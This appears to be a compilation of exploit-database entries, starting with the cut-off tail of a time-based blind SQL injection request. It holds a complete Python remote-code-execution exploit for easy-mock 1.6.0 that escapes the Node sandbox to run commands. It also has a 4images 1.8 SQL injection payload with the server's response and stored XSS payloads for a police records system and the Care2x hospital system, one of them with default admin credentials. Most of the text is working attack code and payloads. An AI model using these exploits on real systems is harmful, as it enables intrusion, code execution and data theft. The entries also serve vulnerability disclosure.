Content-Length: 61 Cache-Control: max-age=0 sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/passwordreset.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=a8600labr48ehj6d8716ho0h61 Connection: close loginId=1&clientId=1&email=hltakydn%40pm.me&pwd=123456&reset= # Vulnerable Payload: # Parameter: loginId (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: loginId=FPDr' AND (SELECT 4535 FROM (SELECT(SLEEP(10)))SJvL) AND 'rtGr'='rtGr&clientId=&email=VXzw&pwd=&reset=xlcX

# Exploit Title: easy-mock 1.6.0 - Remote Code Execution (RCE) (Authenticated) # Date: 12/08/2021 # Exploit Author: LionTree # Vendor Homepage: https://github.com/easy-mock # Software Link: https://github.com/easy-mock/easy-mock # Version: 1.5.0-1.6.0 # Tested on: windows 10(node v8.17.0) import requests import json import random import string target = 'http://127.0.0.1:7300' username = ''.join(random.sample(string.ascii_letters + string.digits, 8)) password = ''.join(random.sample(string.ascii_letters + string.digits, 8)) print(username) print(password) # can't see the result of command cmd = 'calc.exe' # register url = target + "/api/u/register" cookies = {"SSO_LANG_V2": "EN"} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} json_data={"name": username, "password": password} requests.post(url, headers=headers, cookies=cookies, json=json_data) # login url = target + "/api/u/login" cookies = {"SSO_LANG_V2": "EN"} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer undefined", "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} json_data={"name": username, "password": password} req = requests.post(url, headers=headers, cookies=cookies, json=json_data).text login = json.loads(req) token = login['data']['token'] # create project url = target + "/api/project/create" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/new", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} json_data={"description": "just a poc", "group": "", "id": "", "members": [], "name": username, "swagger_url": "", "url": "/" + username} requests.post(url, headers=headers, cookies=cookies, json=json_data) # get project_id url = target + "/api/project?page_size=30&page_index=1&keywords=&type=&group=&filter_by_author=0" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Authorization": "Bearer " + token, "Connection": "close", "Referer": "http://127.0.0.1:7300/login", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} req = requests.get(url, headers=headers, cookies=cookies).text projects = json.loads(req) project_id = projects['data'][0]['_id'] # create mock url = target + "/api/mock/create" cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", "Authorization": "Bearer " + token, "Origin": "http://127.0.0.1:7300", "Connection": "close", "Referer": "http://127.0.0.1:7300/editor/" + project_id, "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} json_data={"description": "poc", "method": "get", "mode": "{\n 'foo': 'Syntax Demo',\n 'name': function() {\n return (function() {\n TypeError.prototype.get_process = f => f.constructor(\"return process\")();\n try {\n Object.preventExtensions(Buffer.from(\"\")).a = 1;\n } catch (e) {\n return e.get_process(() => {}).mainModule.require(\"child_process\").execSync(\"" + cmd + "\").toString();\n }\n })();\n }\n}", "project_id": project_id, "url": "/" + username} requests.post(url, headers=headers, cookies=cookies, json=json_data) # preview mock url = target + "/mock/{}/{}/{}".format(project_id,username,username) cookies = {"SSO_LANG_V2": "EN", "easy-mock_token": token} headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0", "Accept": "application/json, */*", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "http://127.0.0.1:7300/mock/{}/{}/{}".format(project_id,username,username), "Content-Type": "application/json", "Connection": "close", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin", "Cache-Control": "max-age=0"} requests.get(url, headers=headers, cookies=cookies)

# Exploit Title: 4images 1.8 - 'limitnumber' SQL Injection (Authenticated) # Exploit Author: Andrey Stoykov # Software Link: https://www.4homepages.de/download-4images # Version: 1.8 # Tested on: Linux Source Analysis: Line #658 - User action defined if ($action == "findimages") { Line #661 - Vulnerable condition $condition = "1=1"; Line #654 - Default limit 50 show_input_row($lang['results_per_page'], "limitnumber", 50); Line #736 - Define limit start $limitstart = (isset($HTTP_POST_VARS['limitstart'])) ? trim($HTTP_POST_VARS['limitstart']) : ""; if ($limitstart == "") { $limitstart = 0; Line #743 - Define limit number $limitnumber = trim($HTTP_POST_VARS['limitnumber']); if ($limitnumber == "") { $limitnumber = 5000; } Line #763 - Define user input variables $limitfinish = $limitstart + $limitnumber; Line #786 - SQL statement $sql = "SELECT i.image_id, i.cat_id, i.user_id, i.image_name, i.image_media_file, i.image_date".get_user_table_field(", u.", "user_name")." FROM ".IMAGES_TABLE." i LEFT JOIN ".USERS_TABLE." u ON (".get_user_table_field("u.", "user_id")." = i.user_id) WHERE $condition ORDER BY $orderby $direction // Vulnerable user input of limitnumber LIMIT $limitstart, $limitnumber"; Line #852 - Display user input defined previously show_hidden_input("limitnumber", $limitnumber); Exploit POC: 1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+- HTTP Request: POST /4images/admin/images.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 406 Origin: http://127.0.0.1 DNT: 1 Connection: close Referer: http://127.0.0.1/4images/admin/images.php?action=modifyimages Cookie: 4images_lastvisit=1628349389; 4images_userid=1; sessionid=7ndqdr2u04gqs9gdme12vhco87 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: frame Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 __csrf=7aa2dd8597dfe4302237bbfeb200fbd8&action=findimages&image_id=&image_name=&image_description=&image_keywords=&cat_id=0&image_media_file=&image_thumb_file=&dateafter=&datebefore=&downloadsupper=&downloadslower=&ratingupper=&ratinglower=&votesupper=&voteslower=&hitsupper=&hitslower=&orderby=i.image_name&direction=ASC&limitnumber=1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1,1)--+- HTTP Response: HTTP/1.1 200 OK ... <b>XPATH syntax error: ':10.1.37-MariaDB'</b>

# Exploit Title: Police Crime Record Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 12/08/2021 # Exploit Author: Ömer Hasan Durmuş # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Version: v1.0 # Category: Webapps # Tested on: Linux/Windows Step 1 : Login to admin account in http://TARGET/ghpolice/login.php default credentials. (1111:admin123) Step 2 : Then click on the "Add Staff" Step 3 : Input "<img src=x onerror=alert(1)>" in the field "Firstname" or "Othernames" Step 4 : Click on "Save and Continue" Step 5 : Update page.

# Exploit Title: Care2x Open Source Hospital Information Management 2.7 Alpha - 'Multiple' Stored XSS # Date: 13.08.2021 # Exploit Author: securityforeveryone.com # Author Mail: hello[AT]securityforeveryone.com # Vendor Homepage: https://care2x.org # Software Link: https://sourceforge.net/projects/care2002/ # Version: =< 2.7 Alpha # Tested on: Linux/Windows # Researchers : Security For Everyone Team - https://securityforeveryone.com ''' DESCRIPTION Stored Cross Site Scripting(XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters. Example: /modules/registration_admission/patient_register.php POST request Content-Disposition: form-data; name="date_reg" 2021-07-29 12:15:59 -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="title" asd -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_last" asd -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_first" asd -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_2" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_3" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_middle" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_maiden" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="name_others" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="date_birth" 05/07/2021 -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="sex" m -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="addr_str" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="addr_str_nr" XSS -----------------------------29836624427276403321197241205 Content-Disposition: form-data; name="addr_zip" XSS --------------------- If an attacker exploit this vulnerability, takeover any account wants. Payload Used: "><script>alert(document.cookie)</script> EXPLOITATION 1- Login to Care2x Panel 2- /modules/registration_admission/patient_register.php 3- Use the payload vulnerable parameters. ABOUT SECURITY FOR EVERYONE TEAM We are a team that has been working on cyber security in the industry for a long time. In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities. We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools '''